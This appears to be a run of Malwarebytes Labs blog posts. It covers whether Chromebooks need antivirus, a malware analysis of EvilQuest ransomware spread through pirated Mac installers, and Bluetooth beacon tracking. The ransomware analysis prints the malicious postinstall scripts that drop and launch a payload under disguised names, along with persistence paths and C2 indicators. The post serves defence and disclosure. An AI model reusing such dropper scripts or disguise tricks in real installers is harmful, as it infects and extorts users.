There are some additional arguments that could be made against using a Chromebook antivirus program. Chromebooks can download and run Android apps in emulated mode, which increases their security risk. But additional security protocols should prevent this feature from being exploited. These include the following:

• The Play Store and Web Store both check the apps before they are admitted. While this may stop many blatant forms of malware, we find a fair amount of adware and potentially unwanted programs in these stores every day. And now and then, more malicious security threats make their way into the Play Store. And then there is the fact that many users will be tempted to install apps that are not available in the Play or Web Stores (yet).
• Administrator permissions for malware are impossible to get on a Chromebook. While this is true, it does not mean that malware can’t get nasty without these permissions. As we have discussed in our blog on how Chromebooks can and do get infected, there are many examples of malware for Chromebooks that are annoying enough without the need to be elevated.
• Chromebooks are not interesting for malware authors. Again, this may have been true at some point, but the more Chromebooks are out there, the bigger their target audience and the more appealing to focus on that group.

All in all, Chromebook virus protection may not be necessary yet, but there is plenty of malware going around that could ruin your Chromebook experience.

Beware of trusting the OS too much

As we have heard in the past (Macs don’t get infected!), some platforms have reputations for being safer even when the truth is the opposite. For example, this year, Mac malware outpaced Windows malware 2:1.

Windows machines still dominate the market share and tend to have more security vulnerabilities, which have for years made them the bigger and easier target for hackers. But as Apple’s computers have grown in popularity, hackers appear to be focusing more of their attention on the versions of macOS that power them. There is a good chance that with the growing popularity of ChromeOS-based systems, the same will happen in that field.

And the browser

And let’s not forget the weak spot of any OS: its browser. Just the other day, Google removed 106 extensions that were found spying on users. These extensions were all published by the same criminals and were found illegally collecting sensitive user data as part of a massive global surveillance campaign.

Awake Security, which disclosed the findings late last week, said the malicious browser add-ons were tied back to a single Internet domain registrar, GalComm.

This campaign and the Chrome extensions involved performed operations such as taking screenshots of the victim device, loading malware, reading the clipboard, and actively harvesting tokens and user input.

Our advice is that the malware out there today is obtrusive enough to warrant installing extra protection on any device, including a Chromebook. As Chromebooks gain in popularity, cybercriminals will look to profit from them, too. Better to be safe and prepared than to be caught asleep at the laptop.

Stay safe, everyone!

The post Do Chromebooks need antivirus protection? appeared first on Malwarebytes Labs.

A Twitter user going by the handle @beatsballert messaged me yesterday after learning of an apparently malicious Little Snitch installer available for download on a Russian forum dedicated to sharing torrent links. A post offered a torrent download for Little Snitch, and was soon followed by a number of comments that the download included malware. In fact, we discovered that not only was it malware, but a new Mac ransomware variant spreading via piracy.

Installation

Analysis of this installer showed that there was definitely something strange going on. To start, the legitimate Little Snitch installer is attractively and professionally packaged, with a well-made custom installer that is properly code signed. However, this installer was a simple Apple installer package with a generic icon. Worse, the installer package was pointlessly distributed inside a disk image file.

Examining this installer revealed that it would install what turned out to be the legitimate Little Snitch installer and uninstaller apps, as well as an executable file named “patch”, into the /Users/Shared/ directory.

The installer also contained a postinstall script—a shell script that is executed after the installation process is completed. It is normal for this type of installer to contain preinstall and/or postinstall scripts, for preparation and cleanup, but in this case the script was used to load the malware and then launch the legitimate Little Snitch installer.

!/bin/sh
mkdir /Library/LittleSnitchd

mv /Users/Shared/Utils/patch /Library/LittleSnitchd/CrashReporter
rmdir /Users/Shared/Utils

chmod +x /Library/LittleSnitchd/CrashReporter

/Library/LittleSnitchd/CrashReporter
open /Users/Shared/LittleSnitchInstaller.app &

The script moves the patch file into a location that appears to be related to LittleSnitch and renames it to CrashReporter. As there is a legitimate process that is part of macOS named Crash Reporter, this name will blend in reasonably well if seen in Activity Monitor. It then removes itself from the /Users/Shared/ folder and launches the new copy. Finally, it launches the Little Snitch installer.

In practice, this didn’t work very well. The malware got installed, but the attempt to run the Little Snitch installer got hung up indefinitely, until I eventually forced it to quit. Further, the malware didn’t actually start encrypting anything, despite the fact that I let it run for a while with some decoy documents in position as willing victims.

While waiting for the malware to do something—anything!—further investigation turned up an additional malicious installer, for some DJ software called Mixed In Key 8, as well as hints that a malicious Ableton Live installer also exists (although such an installer has not yet been found). There are undoubtedly other installers floating around as well that have not been seen.

The Mixed In Key installer turned out to be quite similar, though with slightly different file names and postinstall script.

!/bin/sh
mkdir /Library/mixednkey

mv /Applications/Utils/patch /Library/mixednkey/toolroomd
rmdir /Application/Utils

chmod +x /Library/mixednkey/toolroomd

/Library/mixednkey/toolroomd &

This one did not include code to launch a legitimate installer, and simply dropped the Mixed In Key app into the Applications folder directly.

Infection

Once the infection was triggered by the installer, the malware began spreading itself quite liberally around the hard drive. Both variants installed copies of the patch file at the following locations:

/Library/AppQuest/com.apple.questd
/Users/user/Library/AppQuest/com.apple.questd
/private/var/root/Library/AppQuest/com.apple.questd

It also set up persistence via launch agent and daemon plist files:

/Library/LaunchDaemons/com.apple.questd.plist
/Users/user/Library/LaunchAgents/com.apple.questd.plist
/private/var/root/Library/LaunchAgents/com.apple.questd.plist

The latter in each group of files, found in /private/var/root/, is likely to be due to a bug in the code that creates the files in the user folder, leading to creation of the files in the root user’s folder. Since it’s quite rare for anyone to actually log in as root, this doesn’t serve any practical purpose.

Strangely, the malware also copied itself to the following files:

/Users/user/Library/.ak5t3o0X2
/private/var/root/Library/.5tAxR3H3Y

The latter was identical to the original patch file, but the former was modified in a very strange way. It contained a copy of the patch file, with a second copy of the data from that file appended to the end, followed by an additional 9 bytes: the hexidecimal string 03705701 00CEFAAD DE. It is not yet known what the purpose of these files or this additional appended data is.

Even more bizarre—and still inexplicable—was the fact that the malware also modified the following files:

/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/crashpad_handler
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateDaemon
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksdiagnostics
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksfetch
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksinstall

These files are all executable files that are part of GoogleSoftwareUpdate, which are most commonly found installed due to having Google Chrome installed on the machine. These files had the content of the patch file prepended to them, which of course would mean that the malicious code would run when any of these files is executed. However, Chrome will see that the files have been modified, and will replace the modified files with clean copies as soon as it runs, so it’s unclear what the purpose here is.

Behavior

The malware installed via the Mixed In Key installer was similarly reticent to start encrypting files for me. I left it running on a real machine for some time with no results, then started playing with the system clock. After setting it ahead three days, disconnecting from the network, and restarting the computer a couple times, it finally began encrypting files.

The malware wasn’t particularly smart about what files it encrypted, however. It appeared to encrypt a number of settings files and other data files, such as the keychain files. This resulted in an error message when logging in post-encryption.

There were other very obvious indications of error, such as the Dock resetting to its default appearance.

The Finder also began showing signs of trouble, with spinning beachballs frequently appearing when selecting an encrypted file. Other apps would also freeze periodically, but the Finder freezes could only be managed by force quitting the Finder.

Although others have reported that a file is created with instructions on paying the ransom, as well as an alert shown, and even text-to-speech used to inform the user they have been infected with ransomware, I was unable to duplicate any of these, despite waiting quite a while for the ransomware to finish.

Capabilities

The malware includes some anti-analysis techniques, found in functions named is_debugging and is_virtual_mchn. This is common with malware, as having a debugger attached to the process or being run inside a virtual machine are both indications that a malware researcher is analyzing it. In such cases, malware will typically not display its full capabilities.

In a blog post on Objective-See, Patrick Wardle outlined the details of how these two routines work. The is_virtual_mchn function actually does not appear to check to see if the malware is running in a virtual machine, but rather tries to catch a VM in the process of adjusting time. It’s not unusual for malware to include delays. For example, the first ever Mac ransomware, KeRanger, included a three day delay between when it infected the system and when it began encrypting files. This helps to disguise the source of the malware, as the malicious behavior may not be immediately associated with a program installed three days before.

This, plus the fact that the malware includes functions with names like ei_timer_create, ei_timer_start, and ei_timer_check, probably means that the malware runs on a time delay, although it’s not yet known what that delay is.

Patrick also points out that the malware appears to include a keylogger, due to presence of calls to CGEventTapCreate, which is a system routine that allows for monitoring of events like keystrokes. What the malware does with this capability is not known. It also opens a reverse shell to a command and control (C2) server.

Open questions

There are still a number of open questions that will be answered through further analysis. For example, what kind of encryption does this malware use? Is it secure, or will it be easy to crack (as in the case of decrypting files encrypted by the FindZip ransomware)? Will it be reversible, or is the encryption key never communicated back to the criminals behind it (also like FindZip)?

There’s still more to be learned, and we will update this post as more becomes known.

Post-infection

If you get infected with this malware, you’ll want to get rid of it as quickly as possible. Malwarebytes for Mac will detect this malware as Ransom.OSX.EvilQuest and remove it.

If your files get encrypted, we’re not sure how dire a situation that is. It depends on the encryption and how the keys are handled. It’s possible that further research could lead to a method for decrypting files, and it’s also possible that won’t happen.

The best way of avoiding the consequences of ransomware is to maintain a good set of backups. Keep at least two backup copies of all important data, and at least one should not be kept attached to your Mac at all times. (Ransomware may try to encrypt or damage backups on connected drives.)

I personally have multiple hard drives for backups. I use Time Machine to maintain a couple, and Carbon Copy Cloner to maintain a couple more. One of the backups is always in the safe deposit box at the bank, and I swap them periodically, so that worst case scenario, I always have reasonably recent data stored in a safe location.

If you have good backups, ransomware is no threat to you. At worst, you can simply erase the hard drive and restore from a clean backup. Plus, those backups also protect you against things like drive failure, theft, destruction of your device, etc.

Indicators of Compromise

Files

patch (and com.apple.questd)
5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b

Little Snitch 4.5.2.dmg
f8d91b8798bd9d5d348beab33604a540e13ce40b88adc096c8f1b3311187e6fa

Mixed In Key 8.dmg
b34738e181a6119f23e930476ae949fc0c7c4ded6efa003019fa946c4e5b287a

Network

C2 server 167.71.237.219
C2 address obtained from andrewka6.pythonanywhere[.]com

The post New Mac ransomware spreading through piracy appeared first on Malwarebytes Labs.

Apps and their permissions have been in the news recently, particularly in relation to tracking/privacy issues and Bluetooth. Why Bluetooth, though? What is it, and what is it doing to raise concerns in some security quarters?

Bluetooth: your cool, then uncool, but mostly cool again cousin

Bluetooth has had a slightly odd reputation down the years. Pre-smart phones, for many people it was “that thing enabled by default, which you can also use to transfer photographs incredibly slowly.” When smart phones came around, it was relegated to “that thing enabled by default, but I’ll turn it off because I have Wi-Fi.”

Bluetooth technology actually has a lot of applications. It’s a short-range wireless communications protocol which doesn’t deserve its occasionally uncool reputation. Its limited range stops it from killing your battery, and from a security standpoint, it’s quite tricky to deliberately attack someone’s mobile device when everything hinges on a target being in a small space at a specific time.

If you want to send contacts or videos to someone, tether devices, talk to people safely while in a car, or even just fire up some wire-free headphones in the gym without hassle, Bluetooth is the place to be. That’s not to say people can’t do bad things with it, of course.

Apple’s AirDrop, which made use of Bluetooth, was caught up in some unsolicited message chaos back in 2018. Bluejacking did similar things and has been around for a long time. Bluetooth isn’t 100 percent secure, but then nothing is. There are multiple steps you can take to lock Bluetooth down, with the caveat that it works best by being open and accessible most of the time.

However, security concerns about Bluetooth are being raised today in the realm of beacon technology.

What is beacon technology?

I’m glad you asked. You likely run into beacons every day without knowing it. For clarity’s sake, there are many beacon types and we’re not focusing on all of them here. Web beacons, which typically track you across websites or email, are interesting but not our focus here. We’re exploring the kind of beacon located in a store you happen to enter, or even just pass by inside a mall, which sees you coming and helps to serve up (say) some targeted advertising on a billboard or helps ad networks push said ads when you get home in your web browser.

We’ll look at what happens once you step inside the store in a little while, but first we need to figure out how to get you to roll up to my wonderland emporium in the first place. The unexpected first step involves a fence, but not the wooden kind.

Putting up a fence

Geofencing has been around for a good while, and you may have come into contact with it without realizing what it’s called. If you’ve read a more recent “What is this technology?” article, you’ll probably see lots of mentions of advertising, marketing, leading offers, customer satisfaction, and more. You’d assume it was some sort of marketing be-all and end-all, created by Steven P. Advertising, CEO of geolocational advertising services.

That’s not quite the case. 

Geofencing allows you to carve out virtual space around a real area. It’ll help prevent toddlers escaping from a nursery, or stop people wearing an ankle bracelet going on the run. It could alert workers in dangerous environments that they’ve wandered into the danger zone, or help businesses keep curious employees or intruders out of secure areas.

As you’ll be aware, some of this has been around seemingly forever. However, marketing and sales have adopted it as a major method for driving sales. If you go searching online, most of the primary results will be for slick marketing operation dot com as opposed oil rig platform safety dot net.

A trail of breadcrumbs

How do I let you know about my cool store if it’s quite a way off from your current location? I could throw up a chain of geofences along the roads you happen to be traveling down. As you pass through the geofenced area, you might start to receive mobile notifications about the awesome and very cheaply priced goods I’m selling.

Why not think bigger? I could geofence some digital billboards as you go driving past.

From your car, to my store: You may not have intended to pay me a visit when you set out this morning, but those adverts for…let’s say delicious sweet rolls…were too good an opportunity to pass up.

My selection of fences has brought you to the store, and now the in-house beacons will do the rest. Everything from your movement around the building to the products you linger on is now potentially up for grabs. But how do I send you some of those juicy beacon ads or follow you round the store like a digital ghost in the first place? How do I know if you’re lingering in front of my sweet rolls or walking on by to reach something more interesting?

The answer is: I need to introduce your mobile device to my good friend, Bluetooth McBeacon.

Bluetooth McBeacon: your new in-store guide

Well, what is a beacon? It’s most frequently a small, randomly shaped device. Could be a box, it might look like a router, or it could resemble one of those targets you strap to your chest in a game of laser tag. Put simply, it could be pretty much anything. It pulses out an ID and when a phone or other device recognises said ID, they’ll have a sales-based marketing conversation.

How to begin that sales-based marketing conversation?

The most common way for this to happen is to create an app, and include Bluetooth pairing as one of the permissions. If I’m strapped for cash or don’t know where to begin cobbling an app together, I don’t have to; there are multiple third-party apps out there which will pop your content via the beacon.

That’s the app part sorted out. My beacon device will make use of various protocols to howl its ID out into the void. Did you know Google made one of these protocols? How about Apple? It’s a whole new world of void howling.

Anyway, my beacon howls into the void at regular intervals—the shorter the better because it allows for more accurate tracking. When someone running the relevant mobile app wanders into the store, the beacon stops howling and starts hi-fiving as the mobile recognises the beacon ID. One quick permission request later, and we’re officially up and running with our previously mentioned sales-based marketing conversation.

The world is now our marketing oyster, and a barrage of targeted advertising, in-store offers, and even ads for objects you lingered in front of (but didn’t buy) will follow you home as a gentle reminder to maybe pick it up online at a discount. Depending on which ad platforms the beacon owner makes use of, they may be able to plug said platform directly into the beacon’s functionality, which would assist in even more detailed forms of tracking.

These techniques, combined with geofencing for maximum marketing impact, are how stores are pushing you to buy their stock and leading you to a marketing metrics bonanza behind the scenes.

There are many other forms of real-world ad pushing techniques, but in terms of Bluetooth and beacons, they’re a little more accessible and straightforward and this is probably why they’re so present in our everyday lives (even if we don’t realise it).

The future of Bluetooth tracking

Various attempts to make augmented reality shopping aids (dragging and dropping VR furniture into your room so you can see if it fits perfectly, waving your phone around to click on digital coupons as you pick up tins of soup, sales assistants knowing which product you hovered your phone over the longest) haven’t exactly exploded the way developers probably thought.

Nice ideas, but a little convoluted and often not practical. Dropping a router-like device in your store and asking people to download your app for some discounts instead? That is the way to go.

What can I do to avoid Bluetooth tracking?

Whether you’re not keen on election-related Bluetooth antics, or simply don’t want to be followed offline or otherwise by a growing collection of stores and malls, Bluetooth is easy to keep a handle on. Most phone models will have it as a default setting whenever you open your options menu, usually next to Wi-Fi. Don’t want Bluetooth doing its thing? Just turn it off.

If you desperately need to use Bluetooth for something specific, enable then disable right after. Keeping an eye on app permissions at install will help, and of course you should be in the habit of doing that anyway, and not just for Bluetooth. A huge range of apps ask for Bluetooth permissions, but that doesn’t necessarily mean they’re up to no good. As mentioned above, Bluetooth has a ton of valid uses, and even tech directly adjacent to it like ringfencing can be used for entirely useful purposes.

The trick is figuring out what the value proposition for the app is and knowing what its owners intend to do with your data once they have it. If you’re happy with their intentions, feel free to grant permission. If you’re unsure, save the install for another day and do some Internet sleuthing before making a commitment.

Because once your device and identity are plugged into an online/offline marketing profile, you may find it almost impossible to extract yourself. Perhaps it’s better to give that tempting-looking sweet roll store a pass.

The post Bluetooth beacons: one free privacy debate with your next order appeared first on Malwarebytes Labs.